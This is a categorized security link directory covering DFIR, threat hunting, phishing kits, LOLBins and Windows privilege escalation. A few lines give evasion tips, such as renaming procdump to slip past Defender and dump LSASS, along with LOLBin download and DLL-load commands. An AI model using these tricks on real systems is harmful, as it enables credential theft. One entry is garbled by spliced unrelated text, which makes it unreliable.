Desperate downloader MSOXMLED.EXE -

CSIRT / Exfiltration / LOLBIN/LOLBAS:

Exploring the WDAC Microsoft Recommended Block Rules: kill.exe . lolbin/lolbas
I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= lolbin/lolbas
C:\Windows\System32\Cmdl32.exe
I shot the sigverif.exe – the GUI-based LOLBin
\http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe
Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus?
C:\Windows\System32\WorkFolders.exe
C:\Windows\System32\certoc.exe -LoadDLL
if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio*" folder, you can bypass Defender and dump LSASS.

CSIRT / Exfiltration

Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service
Living off the land
It's not a forgotten legacy code, it's recidivism : tpmtool drivetracing
Python Keylogger Using Mailtrap.io

CSIRT / Exfiltration / Steganography

A list of useful tools and resources
steghide 593 9 months ago : is a steganography program that is able to hide data in various kinds of image- and audio-files
stegsolve 650 over 3 years ago
Unicode Text Steganography Encoders/Decoders
StegCracker 554 almost 4 years ago : Steganography brute-force utility to uncover hidden data inside files
Simple Image Steganography in Python
How To Hide Data in Images Using Python
Aperi'Solve is an online platform which performs layer analysis on image. The platform also uses zsteg, steghide, outguess, exiftool, binwalk, foremost and strings for deeper steganography analysis
Stegseek 1,034 about 1 year ago : Worlds fastest steghide cracker, chewing through millions of passwords per second

CSIRT / Phishing

Phishing on Twitter 251 over 6 years ago
evilginx2 10,924 3 months ago : Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
shellphish : Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
pompa 49 11 months ago : Fully-featured spear-phishing toolkit - web front-end
..Modlishka.. 4,847 7 months ago : Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side)
Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign
Lure 158 over 1 year ago : User Recon Automation for GoPhish
PhishingKitTracker : An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats
SimplyTemplate 162 almost 7 years ago : Phishing Template Generation Made Easy
Compromising operating systems through fake software updates . Using: is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates
MurmurHash 114 about 1 year ago : This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform
SniperPhish 540 7 months ago : The Web-Email Spear Phishing Toolkit
King Phisher 2,269 4 months ago : Phishing Campaign Toolkit
phishing-frenzy 794 about 1 year ago : Ruby on Rails Phishing Framework
gophish 11,675 2 months ago :
Phishing 101: why depend on one suspicious message subject when you can use many?
Widespread credential phishing campaign abuses open redirector links
ThePhish 1,154 4 months ago : an automated phishing email analysis tool

CSIRT / Forensics

Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
O-Saft 373 4 days ago : OWASP SSL advanced forensic tool
PcapXray 1,698 over 2 years ago A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
swap_digger 513 over 3 years ago is a tool used to automate Linux swap analysis during post-exploitation or forensics
The Sleuth Kit® (TSK) 2,630 7 days ago is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
Invoke-LiveResponse 145 almost 3 years ago
Linux Forensics
CDQR 334 over 2 years ago : The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
mac_apt 781 about 1 month ago : macOS Artifact Parsing Tool
MacForensics 179 4 months ago : Repository of scripts for processing various artifacts from macOS (formerly OSX)
imago-forensics 249 almost 3 years ago : Imago is a python tool that extract digital evidences from images
remedi-infrastructure 4 almost 6 years ago : setup and deployment code for setting up a REMEDI machine translation cluster
Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
libelfmaster 410 16 days ago : Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
usbrip 1,154 about 2 years ago (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines
Digital Forensics and Incident Response : This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response
KAPE Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. . and
AVML 875 9 days ago (Acquire Volatile Memory for Linux)
turbinia 750 6 days ago : Automation and Scaling of Digital Forensics Tools
Eric Zimmerman's Tools
MacQuisition : A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging
Kuiper 769 about 1 month ago : Digital Forensics Investigation Platform
file Signatures :
PowerForensics 1,385 about 1 year ago : PowerForensics provides an all in one platform for live disk forensic analysis
OfficeForensicTools 26 over 4 years ago : A set of tools for collecting forensic information
FBI Electronic Tip For
CHIRP 1,043 over 3 years ago : A forensic collection tool written in Python
Hash Cracking with AWS and hashcat
Hashcat new feature: autodetect hash-mode
L0phtCrack is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables
Foremost 317 over 1 year ago : is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you
TrID : is an utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way
image-unshredding 607 about 8 years ago : Image unshredding using a TSP solver
Linux Incident Response Guide
FastIR Artifacts 160 5 months ago : Live forensic artifacts collector
MVT 10,416 21 days ago (Mobile Verification Toolkit) helps conducting forensics of mobile devices in order to find signs of a potential compromise
Cloud Forensics Triage Framework (CFTF)
Forensic Investigation Cisco Stealthwatch at work
Andriller CE (Community Edition) 1,343 over 2 years ago : is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices
Dshell 5,454 7 months ago is a network forensic analysis framework
exif-gps-tracer 41 almost 4 years ago : A python script which allows you to parse GeoLocation data from your Image files stored in a dataset.It also produces output in CSV file and also in HTML Google Maps

CSIRT / Forensics / Anti-Forensics:

ShredOS x86_64 - Disk Eraser 1,506 2 months ago : for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe

CSIRT / Forensics

dfir_ntfs 191 15 days ago : An NTFS/FAT parser for digital forensics & incident response
MemProcFS 3,115 7 days ago : is an easy and convenient way of viewing physical memory as files in a virtual file system
LeechCore 522 about 1 month ago : Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent
PCILeech 5,011 12 days ago : Direct Memory Access (DMA) Attack Software

CSIRT / Forensics / PDF

PDF Tools
peepdf 1,309 3 months ago : Powerful Python tool to analyze PDF documents
How to Protect Files With Canary Tokens
Attacks on PDF Certification
How to remove malicious code from PDF files
mu tools
PDF forensics with Kali Linux : pdfid and pdfparser
How can I extract a JavaScript from a PDF file with a command line tool?
Insecure Features in PDFs.
Shadow Attacks … the smallest attack vector ever

CSIRT / Forensics / Email Headers

Configuring MTA-STS and TLS Reporting For Your Domain
Google Admin Toolbox
Azure Message Header Analyzer

CSIRT / Forensics / Distros

CAINE : Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project
e-Fense Helix 3
black arch : An ArchLinux based distribution for penetration testers and security researchers
List of Live Distributions for Computer Forensics

CSIRT / Forensics / Volatility

volatility 7,343 over 1 year ago : An advanced memory forensics framework
Volatility profiles for Linux and Mac OS X 318 about 2 years ago
Building a profile for Volatility
OROCHI 225 7 days ago : The Volatility Collaborative GUI
AutoVolatility 108 about 2 years ago : Run several volatility plugins at the same time
Memory Forensics and Analysis Using Volatility
Volatility, my own cheatsheet (Part 1): Image Identification
First steps to volatile memory analysis
MemLabs 1,659 over 3 years ago : Educational, CTF-styled labs for individuals interested in Memory Forensics

CSIRT / Blue Team / MITRE ATT&CK:

ATTACK-Tools 1,012 6 months ago : Utilities for MITRE™ ATT&CK
Analisando ameaças com Mitre ATT&CK Navigator (pt-br)
ATT&CK™ Navigator : Web app that provides basic navigation and annotation of ATT&CK matrices
Atomic Threat Coverage 972 over 2 years ago : Actionable analytics designed to combat threats based on MITRE's ATT&CK
atomic-red-team 9,782 9 days ago : Small and highly portable detection tests based on MITRE's ATT&CK
Welcome to Stealthbits Attack Catalog : Adversary techniques for credential theft and data compromise
Splunk Attack Range 2,154 16 days ago : A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk
attack-scripts 581 12 months ago : Scripts and a (future) library to improve users' interactions with the ATT&CK content
Windows-specific MITRE ATT&CK techniques application control prevention assessment. This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windows-signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications
Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
EU MITRE ATT&CK® Community
Mitre Att&ck Matri 18 over 3 years ago
Best Practices for MITRE ATT&CK® Mapping

CSIRT / Blue Team

MITRE D3FEND
DeTTECT 2,066 15 days ago : Detect Tactics, Techniques & Combat Threats

CSIRT / Blue Team / Sysmon:

Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
Sysmon 12.0 — EventID 24 : is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring
SysmonX 210 about 5 years ago : An Augmented Drop-In Replacement of Sysmon
SysmonSimulator 833 almost 3 years ago : Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams

CSIRT / Blue Team

Awesome Honeypots 8,661 3 months ago : A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects
T-Pot 6,855 8 days ago : The All In One Honeypot Platform 
Blue Team Fundamentals
Blue Team fundamentals Part Two : Windows Processes
Sooty 1,352 about 2 months ago : The SOC Analysts all-in-one CLI tool to automate and speed up workflow
Your detections aren't working
elastalert 7,997 4 months ago : Easy & Flexible Alerting With ElasticSearch
Technical Approaches to Uncovering and Remediating Malicious Activity : Alert (AA20-245A)
EVTX-ATTACK-SAMPLES 2,248 almost 2 years ago : Windows Events Attack Samples
Windows Advanced Audit Policy Map to Event IDs
takuan 84 over 3 years ago is a system service that parses logs and dectects noisy attackers in order to build a blacklist database of known cyber offenders.,
CobaltStrikeScan 900 over 3 years ago : Scan files or process memory for CobaltStrike beacons and parse their configuration
Hunting and detecting Cobalt Strike
Cobalt Strike Beacon Analysis . python decoder:
How to Design Detection Logic - Part 1
MitigatingPass-the-Hashand OtherCredential Theft
Evilginx-ing into the cloud: How we detected a red team attack in AWS
Hidden Shares as bait
Blue Team 201: Detection — Where Do You Start?
The DML model
Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
hashlookup CIRCL API
BaselineTraining 12 over 5 years ago : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk
Practical Training for Blue Teamers
BLUE TEAM LABS ONLINE
Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.

CSIRT / Blue Team / Threat Hunting

Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
Comprehensive Threat Intelligence Talos Blog || Cisco Talos Intelligence Group - : Adwind Dodges AV via DDE
strelka 882 about 1 month ago : Scanning files at scale with Python and ZeroMQ
Threat-Hunting 255 almost 6 years ago : Personal compilation of APT malware from whitepaper releases, documents and own research
ThreatHunter-Playbook 4,025 9 months ago : A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns
HELK : The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack
mordor 1,603 8 months ago : Re-play Adversarial Techniques
ioc_writer 200 over 1 year ago : Provide a python library that allows for basic creation and editing of OpenIOC objects
3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces) . For #redteam u can blend in with mimicking case1 by naming ur module something like MSI*.tmp and using similar export fct name (dll path usually under c:\users* so no high priv needed)
thethe : Simple, shareable, team-focused and expandable threat hunting environment

CSIRT / Blue Team / Threat Hunting / Mordor PCAPs 📡:

Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩 Part 1:

CSIRT / Blue Team / Threat Hunting

cyber-threat-response-clinic 4 6 days ago
opencti :
securityonion 3,293 4 days ago : Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management
TheHive 3,446 almost 2 years ago : a Scalable, Open Source and Free Security Incident Response Platform
TheHive4py 218 11 days ago : Python API Client for TheHive
TheHiveIRPlaybook 12 over 4 years ago is a collection of TheHive case templates used for Incident Response
Cortex-Analyzers 434 14 days ago : Cortex Analyzers Repository
Nimbus Network Traffic Analyzer Augmented with our world-class threat intelligence
ja3 2,768 about 1 year ago is a standard for creating SSL client fingerprints in an easy to produce and shareable way
Threat Hunting Process 5 over 4 years ago
Threat Hunting Princiĺes 372 almost 2 years ago
TypeDB CTI 145 about 1 year ago :
API-To-Event 75 about 5 years ago Some repos from hunters-forge: , ,
Yeti 1,745 7 days ago :
Watcher 862 15 days ago : Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS

CSIRT / Blue Team / Threat Hunting / Network Analysys:

traffic-analysis-workshop 78 about 3 years ago and
Wireshark Tutorial: Exporting Objects from a Pcap
Hex Packet Decoder : Hex Packet Decoder provides an for you to parse network packets
Packetor : Packetor is an online hex-dump packet analyzer / decoder
Termshark : , inspired by Wireshark
Wireshark Tutorial: Wireshark Workshop Videos Now Available
Wireshark Tutorial: Decrypting HTTPS Traffic

CSIRT / Blue Team / Threat Hunting

Lookup Before You Go-Go...Hunting
Insider Threat Hunting and
Wazuh : is a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. and
Hunting the Hunters - RCE in Covenant C2
Passive SSH : Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion). repo:
EVTX-ATTACK-SAMPLES 2,248 almost 2 years ago : Windows Events Attack Samples
Cyber Threat Intelligence
Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
D4 core 43 11 months ago : D4 core software (server and sample sensor client)
A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
CTI SquadGoals — Setting Requirements
Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
BeaconEye 885 3 months ago : Hunts out CobaltStrike beacons and logs operator command output
Datafeeds/API SANS DShiled
The State of Threat Hunting and the Role of the Analyst
Deepfence ThreatMapper 4,837 7 days ago : Identify vulnerabilities in running containers, images, hosts and repositories
SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
All Access Pass: Five Trends with Initial Access Brokers
Paint it, Blue - Transitionin from CTI to HUNT 13 over 1 year ago : Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!!
Interesting large and small malspam attachments from 2023
MISP (core software) 5,387 6 days ago Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
MISP galaxy 531 7 days ago : Clusters and elements to attach to MISP events or attributes (like threat actors)
DigitalSide Threat-Intel 148 about 1 month ago : Threat-Intel repository
MISP-sizer 11 over 6 years ago : Sizing your MISP instance
MISP RPM 34 about 1 month ago : RPM packages for MISP
ansible MISP 52 11 days ago : ansible role to setup MISP, Malware Information Sharing Platform & Threat Sharing
MISP CERT.br
misp-warninglist 532 11 days ago : Warning lists to inform users of MISP about potential false-positives or other information in indicators
MISP-maltego 170 5 months ago : Set of Maltego transforms to inferface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset
misp-modules 345 4 days ago : Modules for expansion services, import and export in MISP
misp-taxonomies 264 4 days ago : Taxonomies used in MISP taxonomy system and can be used by other information sharing tool
PyMISP 445 7 days ago : Python library using the MISP Rest API
MISP Concepts Cheat sheet
CyCAT.org API services 30 almost 2 years ago : API back-end server including crawlers
teslacoil.py : Monitors some log files and send new entries to syslog

CSIRT / Blue Team / Threat Hunting / Tutorials:

MISP Training - Youtube CIRCL
Youtube CIRCL
PyMISP and MISP Objects: a door to new opportunities
Additional MISP training materials (including slides, documentation and videos 389 about 1 month ago
Additional MISP training materials for law-enforcement agencies 31 about 1 year ago

CSIRT / Blue Team / Threat Hunting

More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting APT33: . .
Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
Adversary Reports : The latest whitepapers, solution briefs, and datasheets from Dragos
APT29 targets COVID-19 vaccine development
What is APT28's Drovorub Malware?
Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS'​ Malware at Scale
Tracking A Malware Campaign Through VT
More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
US Charges Five Alleged Members of APT41 Group APT41:
Analysis Report (AR20-268A)
Cyber Planning for Response and Recovery Study CYPRESS - 2020 FERC, NERC and REs Report
TA505 CHIMBORAZO
A Threat Actor Encyclopedia Threat Group Cards:
Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor . , symantec: . SunBurst_DGA_Decode
SolarWinds Security Advisory
If you work in a SOC, print out this screenshot & pin it to a wall in your office
Customer Guidance on Recent Nation-State Cyber Attacks
Mapping out AridViper Infrastructure Using Augury’s Malware Module
The Story of Jian : How APT31 Stole and Used an Unknown Equation Group 0-Day
APT Encounters of the Third Kind
Lazarus APT conceals malicious code within BMP image to drop its RAT found new
distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
Analysis of the Iranian cyber attack landscape
Lemon Duck spreads its wings : Actors target Microsoft Exchange servers, incorporate new TTPs
threat actortouching an endpoint
China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation
APTnotes 1,658 4 months ago is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets
The Active Adversary Playbook 2021 : Attacker behaviors, tactics, techniques and procedures (TTPs)
An Update on Industrialize the Tracking of Botnet Operations
Patchwork APT caught in its own web
Armagedon/Gamaredon
North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
Update on cyber activity in Eastern Europe
Cisco Talos shares insights related to recent cyber attack on Cisco
Operation Triangulation: The last (hardware) mystery

CSIRT / Blue Team / IoCs

sophos labs IoCs 545 17 days ago : Sophos-originated indicators-of-compromise from published
DailyIOC 310 12 months ago : IOC from articles, tweets for archives
CVE-2020-1472 Zerologon IoCs
iocs 702 about 1 month ago : Indicators from Unit 42 Public Reports
Threat intelligence and threat detections 53 almost 4 years ago : Threat intelligence and threat detection indicators (IOC, IOA)
APT_Digital_Weapon 896 3 months ago : Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin
Ryuk Speed Run, 2 Hours to Ransom
What did DeathStalker hide between two ferns?
Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
Netfilter Rootkit Samples
Feodo Tracker tracks certain families that are related or that evolved from Feodo
There are evil packages on the npm registry that deploy XMRIG
Emotet 2022 | epoch4 | 22.04.2022 | 55 over 1 year ago
238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.
malware-IoC 14 about 1 year ago : Bienvenidos al repositorio oficial de IoC del equipo de Cyber Threat intelligence de Entel Cyber Secure
IcedID | 31.08.2022 | Campaign 2786525712 34 12 months ago

CSIRT / Blue Team / SIEM

Sigma 8,371 7 days ago : Generic Signature Format for SIEM Systems

CSIRT / Blue Team / SIEM / Sigma

Suspicious Use of Procdump 8,371 7 days ago : Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable
KrbRelayUp local privilege escalation. 115 2 months ago

CSIRT / Blue Team / SIEM

Events Heatmap
RedELK 2,383 2 months ago : Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations
plaso 1,734 about 1 month ago : Super timeline all the things
Heatmaps Make Ops Better
graylog-guide-snort 27 about 1 year ago : How to send structured Snort IDS alert logs into Graylog
TALR 89 almost 6 years ago : Threat Alert Logic Repository
Auditing Continuously vs. Monitoring Continuously
Logsspot : Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use to improve detection and intelligence
Corsair 7 over 5 years ago : Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC)
Scalable Logging and Tracking
Logs were our lifeblood. Now they're our liability.
Using Flume to Collect Apache 2 Web Server Logs
spectx : Instantly parse and investigate raw log files
The log/event processing pipeline you can't have
Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
Here's a Splunk way to score behaviors that are derived from detections
ProductLoggingTracker 7 almost 5 years ago : Simple list of product types that InfoSec professionals may want to collect into a central repository
The Log Pile : scripts to help witch log to save
Part of my role is ensuring we're not EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
LORG 209 over 5 years ago : Apache Logfile Security Analyzer
Shipping to Elasticsearch Microsoft DNS Logs
Windows 10 ETW Events 267 7 months ago : Events from all manifest-based and mof-based ETW providers across Windows 10 versions
Log Parser Lizard : provides a modern graphical user interface to Microsoft Log Parser 2.2 for analyzing logs using SQL queries
Fluentd 12,912 10 days ago : Unified Logging Layer (project under CNCF)
Laurel 711 23 days ago : Transform Linux Audit logs for SIEM usage
Matano 1,470 4 months ago : The open-source

CSIRT / Browsers

SOK: On the Analysis of Web Browser Security
Bypassing Browser Security Warnings with Pseudo Password Fields
New Cache ATtacks on TLS Implementations The 9 Lives of Bleichenbacher's CAT:
How To Blow Your Online Cover With URL Previews
Nefarious LinkedIn : A look at how LinkedIn exfiltrates extension data from your browser
Lightnion 119 about 4 years ago : A light version of Tor portable to the browser
Puppeteer 88,848 8 days ago : Headless Chrome Node API
uBlock Origin 47,504 6 days ago : An efficient blocker for Chromium and Firefox. Fast and lean
autochrome 446 8 months ago : This tool downloads, installs, and configures a shiny new copy of Chromium
BROWSERGAP :Browse Anything Securely, Browse the web without the web browsing you
browsergap.ce 3,454 13 days ago : Simple Isolated Remote Browsers, Open Source
Crash Chrome
Firefox: How a website could steal all your cookies
Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique

CSIRT / Browsers / Browsers Addons

Addons for Firefox :
LinkGopher
(Image) WebDeveloper
(Image) IPvFoo
DownthemAll
SixorNot
Uppity
Cliget
(Image) URLs List
Link Redirect Trace
Tamper Data for FF Quantum
BuiltWith
Wappalyzer
Exif Viewer
Anti-Grabify Browser Extension 64 8 months ago

CSIRT / Operating Systems

bochspwn-reloaded 297 over 5 years ago : A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
drltrace 389 over 4 years ago : Drltrace is a library calls tracer for Windows and Linux applications
shellz 569 4 months ago : is a small utility to track and control your ssh, telnet, web and custom shells
CLIP OS : Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
How to Get Started With VMware vSphere Security « vMiss.net
routeros 866 almost 2 years ago : RouterOS Bug Hunt Materials Presented at Derbycon 2018
Awesome-Study-Resources-for-Kernel-Hacking 106 over 8 years ago : Kernel Hacking study materials collection
Skadi 491 about 2 years ago : Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux
taintgrind 249 about 1 year ago :A taint-tracking plugin for the Valgrind memory checking tool
UPX is a free, portable, extendable, high-performance executable packer for several executable formats

CSIRT / Operating Systems / Mainframe:

MF Sniffer 47 over 1 year ago : Mainframe TN3270 unencrypted TSO session user ID and password sniffer

CSIRT / Operating Systems

magic-trace 4,658 about 1 month ago : collects and displays high-resolution traces of what a process is doing

CSIRT / Operating Systems / UEFI

uefi-jitfuck 85 over 6 years ago : A JIT compiler for Brainfuck running on x86_64 UEFI
Secure Boot in the Era of the T2 : Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot
PSPTool 611 2 months ago : Display, extract, and manipulate PSP firmware inside UEFI images
Project Mu : is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern
Force firmware code to be measured and attested by Secure Launch on Windows 10

CSIRT / Operating Systems / Windows

Awesome Advanced Windows Exploitation References 1,457 almost 3 years ago
windows kernel security development 1,957 about 2 years ago
A process scanner detecting and dumping hollowed PE modules. 2,032 16 days ago
dll_to_exe 794 over 1 year ago : Converts a DLL into EXE
pe-sieve 3,103 16 days ago : Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches)
A PowerShell utility to dynamically uncover a DCShadow attack
MSRC 1,324 4 months ago Security Research from the Microsoft Security Response Center ( )
DCSYNCMonitor 138 over 6 years ago
Total Meltdown?
DetectionLab 4,647 5 months ago : Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post
powerlessshell 1,474 over 1 year ago : Run PowerShell command without invoking powershell.exe
internal-monologue 1,401 about 6 years ago : Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
Robber 765 over 2 years ago is open source tool for finding executables prone to DLL hijacking
Remote-Desktop-Caching 208 over 6 years ago
LogRM 73 over 5 years ago : LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou
InvisiblePersistence 338 over 6 years ago : Persisting in the Windows registry "invisibly"
Dynamic Tracing in Windows 10 19H1
Capturing NetNTLM Hashes with Office [DOT] XML Documents
LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
Passing-the-Hash to NTLM Authenticated Web Applications
Detours 5,270 about 1 month ago : Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form
r0ak 28 about 6 years ago : r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems
SpeculationControl 130 over 1 year ago : SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown)
pdf Reverse Engineering Windows Defender (by Alexei Bulazel): and

CSIRT / Operating Systems / Windows / pdf

XOR encryption – Windows x64 Ground Zero: Part 2-2
Building Cracked Binaries – Windows x64 Ground Zero: Part 2-3

CSIRT / Operating Systems / Windows

EKFiddle 636 5 days ago : A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general
Windows Command-Line : Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
MSconsole 95,774 6 days ago : Windows Console Tools
PowerShell Remoting by Stephanos Constantinou Blog
DbgShell 675 8 months ago : A PowerShell front-end for the Windows debugger engine
Windows Incident Response: Updates
Win 10 related research 178 11 months ago
Event log 'Keywords' p1 178 11 months ago
Windows 10 - Notifications 178 11 months ago

CSIRT / Operating Systems / Windows

UAC bypass using CreateNewLink COM interface

CSIRT / Operating Systems / Windows / Privilege Escalation:

Windows Privilege Escalation (Unquoted Path Service)
WinPwnage 2,622 almost 2 years ago : Elevate, UAC bypass, privilege escalation, dll hijack techniques
Securing SCOM in a Privilege Tiered Access Model –Part 1
Windows Privilege Escalation Guide : This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect
An introduction to privileged file operation abuse on Windows : This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs
Control Flow Guard Teleportation : The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. [demo](https:/The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.nprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. - Interactive CTF Exploration Tool
PsExec Local Privilege Escalation
SweetPotato 1,622 3 months ago : Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019
Windows Exploit Suggester - Next Generation (WES-NG) 4,226 10 days ago
Windows Local Privilege Escalation Cookbook 981 8 months ago

CSIRT / Operating Systems / Windows

Remote NTLM relaying through meterpreter on Windows port 445 , : A TCP packet diverter for Windows platform
Analyzing obfuscated powershell with shellcode ,
Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.
relayer 148 almost 6 years ago : SMB Relay Attack Script
Ps1jacker 61 about 6 years ago : Ps1jacker is a tool for generating COM Hijacking payload
python-dotnet-binaryformat 49 about 6 years ago : Pure Python parser for data encoded by .NET's BinaryFormatter
Firework 44 over 4 years ago : Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process
hUACME 6,377 4 months ago : Defeating Windows User Account Control
SysmonTools 1,488 6 months ago : Utilities for Sysmon
